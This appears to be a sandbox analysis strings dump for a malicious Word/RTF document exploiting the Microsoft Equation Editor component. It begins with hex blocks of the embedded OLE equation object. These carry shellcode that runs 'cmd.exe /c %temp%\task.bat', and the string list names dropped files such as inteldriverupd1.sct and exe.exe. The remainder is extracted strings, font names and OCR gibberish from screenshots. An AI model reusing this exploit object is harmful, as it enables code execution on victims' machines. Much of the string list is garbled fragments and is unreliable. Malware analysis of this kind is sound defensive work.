FF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF0500000006000000070000000800000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01000000000000007C010000040100003C0100000100090000039E00000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002000300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000007E010000000000005200690063006800450064006900740046006C0061006700730000000000000000000000000000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000B000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100000300000000000000000000000000000000000000000000004E414E49000000000000010000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4EE5B0000000000030100030A0A08000133C0508D44245250EB7F636D642E657865202F63202574656D70255C7461736B2E6261742020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202026908B44242C662D51A8FFE025000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202020000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F0010000030000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata \mmath\bin-00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000039B1A0B1020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000C096012E4C8AD30103000000000300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000690000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF0500000006000000070000000800000009000000FEFFFFFF0B000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C0000000000000461A0000004D6963726F736F667420B9ABCABD20332E3020D6D0CEC4B0E6000C0000004453204571756174696F6E000B0000004551754154696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF0000000000000000050F00001102000056010000010009000003AB00000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02E001A00D1200000026060F001A00FFFFFFFF000010000000C0FFFFFFACFFFFFF600D00008C0100000B00000026060F000C004D61746854797065000030001C000000FB0280FE000000000000BC020000000004020040436F6D69632053616E73204D5300DFE8FEFFFFFF53180A3400000A0000000000040000002D0100000A000000320A80012E0905000000626302004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002010300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000007E010000000000006500510055004100540049004F004E0020004E00410054004900560045000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A00000061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000646566000C000000320A80011C000A000000313233343536373839610A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000860102022253797374656D000048008A0000000A00FA17660548008A00FFFFFFFFB8EC1900040000002D01010004000000F001000003000000000000001C0000000200BEC34500000000000000282468007CA8690000000000030000000000080000436D44202F432025746D70255C7461736B2E6261742020202020202020202020202026205555555555555555120C6300440002816500028166000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C455049435400E3090000D4F4FFFF020400000800E3092C0B0000010009000003FD01000005001C00000000000400000003010800050000000B0200000000050000000C02A4025702040000002E0118001C000000FB02A4FF0000000000009001000000000440002243616C6962726900000000000000000000000000000000000000000000000000040000002D010000040000002D010000040000002D010000040000000201010005000000090200000002030000001E00070000001604A4025602000000000C00000040096200FF0000000000000058025802FFFF000007000000FC020000FFFFFF020000040000002D01010007000000FC020000000000020000040000002D0102000C00000040092100F00000000000000006000600FFFF0000040000002D010100040000002D0102000C00000040092100F00000000000000006000600FFFF0000040000002D010100040000002D0102000C00000040092100F00000000000000006004C02FFFF0600040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F00000000000000006000600FFFF5202040000002D010100040000002D0102000C00000040092100F00000000000000006000600FFFF5202040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000004C02060005000000040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000004C02060005005202040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000000600060051020000040000002D010100040000002D0102000C00000040092100F0000000000000000600060051020000040000002D010100040000002D0102000C00000040092100F00000000000000006004C0251020600040000002D01010005000000090200000002050000000102FFFFFF02040000002D0102000C00000040092100F0000000000000000600060051025202040000002D010100040000002D0102000C00000040092100F0000000000000000600060051025202040000002D01010005000000090200000002050000000102FFFFFF0207000000FC020000FFFFFF000000040000002D010300040000002701FFFF040000002D010000040000002D010000040000002D010000050000000902000000020D000000320A5702580201000400000000005602A40220003600050000000902000000021C000000FB021000070000000000BC02000000000102022253797374656D0000690D461E2080AC1480C28B75D0811D00A004817580C28B75040000002D010400040000002D01040004000000F0010200030000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objemb\objupdate\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objhtml\objupdate\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\object\objhtml\v

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\}DU4p

Ansi based on Dropped File (~WRC0000.tmp)

]yA%h0>UH=}Vx!#YAOi%E$K[|

Ansi based on Dropped File (~WRC0000.tmp)

^Gz(@p-k7+7

Ansi based on Dropped File (~WRC0000.tmp)

_,_1cc_e_

Ansi based on Image Processing (screen_3.png)

_,_1i,__'c_.crt

Ansi based on Image Processing (screen_3.png)

_-___M__

Ansi based on Image Processing (screen_0.png)

_/_=_--',__-_-,_-_-,J

Ansi based on Image Processing (screen_6.png)

_0___

Ansi based on Image Processing (screen_3.png)

_0____8

Ansi based on Image Processing (screen_6.png)

_::_::_

Ansi based on Image Processing (screen_3.png)

_??_?_

Ansi based on Image Processing (screen_0.png)

_?m_q?

Ansi based on Image Processing (screen_0.png)

_^^''

Ansi based on Image Processing (screen_6.png)

__0__@_'

Ansi based on Image Processing (screen_6.png)

__?J?_?_m_?_____m??mu?___?_______

Ansi based on Image Processing (screen_0.png)

___?_________

Ansi based on Image Processing (screen_0.png)

____80

Ansi based on Image Processing (screen_3.png)

_____

Ansi based on Image Processing (screen_3.png)

_____:_,____

Ansi based on Image Processing (screen_6.png)

_____=____=?_

Ansi based on Image Processing (screen_6.png)

______

Ansi based on Image Processing (screen_3.png)

_______

Ansi based on Image Processing (screen_6.png)

________

Ansi based on Image Processing (screen_3.png)

_______cJ?_L_

Ansi based on Image Processing (screen_0.png)

__Rgplacg

Ansi based on Image Processing (screen_3.png)

__v________

Ansi based on Image Processing (screen_0.png)

_COpY

Ansi based on Image Processing (screen_3.png)

_diting

Ansi based on Image Processing (screen_3.png)

_elinked_les_

Ansi based on Image Processing (screen_3.png)

_han.__

Ansi based on Image Processing (screen_6.png)

_i8_0_

Ansi based on Image Processing (screen_3.png)

_kv@fkv

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_L'Jt

Ansi based on Image Processing (screen_6.png)

_lclose

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_ldi1-ul_

Ansi based on Image Processing (screen_6.png)

_les.

Ansi based on Image Processing (screen_3.png)

_llseek

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_lread

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_lwrite

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

_m____qJ_?_

Ansi based on Image Processing (screen_0.png)

_n__::_::_

Ansi based on Image Processing (screen_6.png)

_n_ins

Ansi based on Image Processing (screen_3.png)

_ncirt

Ansi based on Image Processing (screen_6.png)

_sct_c_J_lnJ9r1_crcsc_crccr_tlcn_nllrl9htsr_s___d

Ansi based on Image Processing (screen_0.png)

`.rdata

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

`3Ax&sA,/fvXb9<'O:*B{Yg2A

Ansi based on Dropped File (decoy.doc)

`zI"~gcRHc#_Q0bG'|OJ:m)DD{j!3&FGG$Sg#AJ\bXkW'|GJsN[N4'!

Ansi based on Dropped File (~WRC0000.tmp)

a powerful upgrade to Equation Editor with many additional features.Do you want to find out more about MathType?

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

A&llCtrl+A

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

A.._,

Ansi based on Image Processing (screen_6.png)

A=>2=>9 H@8DB 0170F0XiX

Ansi based on Dropped File (decoy.doc)

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+-

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ABDFILORSX

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

able as this equation is being edited in a documentmScales the editing view to another magnificationNot available as this equation is being edited in a document

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

abnormal program termination

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

About Microsoft Equation Editor

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

AboutMathType

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

acing...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Active

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Agency FB

Unicode based on Runtime Data (WINWORD.EXE )

AgentAnim

Unicode based on Runtime Data (WINWORD.EXE )

AgPj@

Ansi based on Dropped File (~WRC0000.tmp)

Aharoni

Unicode based on Runtime Data (WINWORD.EXE )

alFilename

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Algerian

Unicode based on Runtime Data (WINWORD.EXE )

Align &Left

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

aln_l

Ansi based on Image Processing (screen_6.png)

Andalus

Unicode based on Runtime Data (WINWORD.EXE )

Angsana New

Unicode based on Runtime Data (WINWORD.EXE )

AngsanaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Aparajita

Unicode based on Runtime Data (WINWORD.EXE )

appr0ximati

Ansi based on Image Processing (screen_3.png)

Arabic Typesetting

Unicode based on Runtime Data (WINWORD.EXE )

ariable . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Arial

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Arial Black

Unicode based on Runtime Data (WINWORD.EXE )

Arial Narrow

Unicode based on Runtime Data (WINWORD.EXE )

Arial Rounded MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

Arrow (both directions)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

At &=

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ation in %s

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

atrix-Vector . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

AuFS!TK,*XX7HfgF)',FXy#w;H"s2y#`"sgESG

Ansi based on Dropped File (~WRC0000.tmp)

AutoConfigURL

Unicode based on Runtime Data (WINWORD.EXE )

AutoDetect

Unicode based on Runtime Data (WINWORD.EXE )

available - the insertion point is not in a pilePCenters the lines in a pileNot available - the insertion point is not in a pileURight-aligns the lines in a pileNot available - the insertion point is not in a pilehAligns equality/inequality signs of lines in a pileNot available - the insertion point is not in a pile

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Ay[Z|`nmsT79x<.

Ansi based on Dropped File (~WRC0000.tmp)

B_U_xx'

Ansi based on Image Processing (screen_6.png)

Ba&seline

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Baskerville Old Face

Unicode based on Runtime Data (WINWORD.EXE )

Batang

Unicode based on Runtime Data (WINWORD.EXE )

BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

Bauhaus 93

Unicode based on Runtime Data (WINWORD.EXE )

Bell MT

Unicode based on Runtime Data (WINWORD.EXE )

ber . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Berlin Sans FB

Unicode based on Runtime Data (WINWORD.EXE )

Berlin Sans FB Demi

Unicode based on Runtime Data (WINWORD.EXE )

Bernard MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Best regards,

Ansi based on Dropped File (decoy.doc)

Blackadder ITC

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Black

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Poster Compressed

Unicode based on Runtime Data (WINWORD.EXE )

Book Antiqua

Unicode based on Runtime Data (WINWORD.EXE )

Bookman Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Bookshelf Symbol 7

Unicode based on Runtime Data (WINWORD.EXE )

Bradley Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

Britannic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Broadway

Unicode based on Runtime Data (WINWORD.EXE )

Browallia New

Unicode based on Runtime Data (WINWORD.EXE )

BrowalliaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Brush Script MT

Unicode based on Runtime Data (WINWORD.EXE )

C3&L&oI{Ixr~,Xxw#\b\eV|,>*wwPkXR0H4;"A5Vo+?H` ^YyL8Hok"=YU'5]Av:5&iBpM. / M'&

Ansi based on Dropped File (~WRC0000.tmp)

c_nc___

Ansi based on Image Processing (screen_0.png)

c_t._;.,.

Ansi based on Image Processing (screen_6.png)

Calibri

Unicode based on Runtime Data (WINWORD.EXE )

Californian FB

Unicode based on Runtime Data (WINWORD.EXE )

Calisto MT

Unicode based on Runtime Data (WINWORD.EXE )

Cambria

Unicode based on Runtime Data (WINWORD.EXE )

Cambria Math

Unicode based on Runtime Data (WINWORD.EXE )

can't find chunk to free

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Can't Undo

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Cancel

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

CancelIo

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Candara

Unicode based on Runtime Data (WINWORD.EXE )

Castellar

Unicode based on Runtime Data (WINWORD.EXE )

Ce&nter

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Centaur

Unicode based on Runtime Data (WINWORD.EXE )

Century

Unicode based on Runtime Data (WINWORD.EXE )

Century Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Century Schoolbook

Unicode based on Runtime Data (WINWORD.EXE )

CG Times

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

CG Universe

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

changg

Ansi based on Image Processing (screen_3.png)

Character Format

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

charactirc

Ansi based on Image Processing (screen_3.png)

Chiller

Unicode based on Runtime Data (WINWORD.EXE )

classid="{204774CF-D251-4F02-855B-2BE70585184B}"

Ansi based on Dropped File (inteldriverupd1.sct)

Clipbaard

Ansi based on Image Processing (screen_3.png)

CliPbOard

Ansi based on Image Processing (screen_6.png)

CloseHandle

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

CLSID\{0002CE02-0000-0000-C000-000000000046}\DefaultIcon

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

CLSID\{0002CE02-0000-0000-C000-000000000046}\LocalServer32

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Colonna MT

Unicode based on Runtime Data (WINWORD.EXE )

ColonSemicolon

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

colortbl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Comic Sans MS

Unicode based on Runtime Data (WINWORD.EXE )

CompanyName

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Consolas

Unicode based on Runtime Data (WINWORD.EXE )

ConsoleTracingMask

Unicode based on Runtime Data (exe.exe )

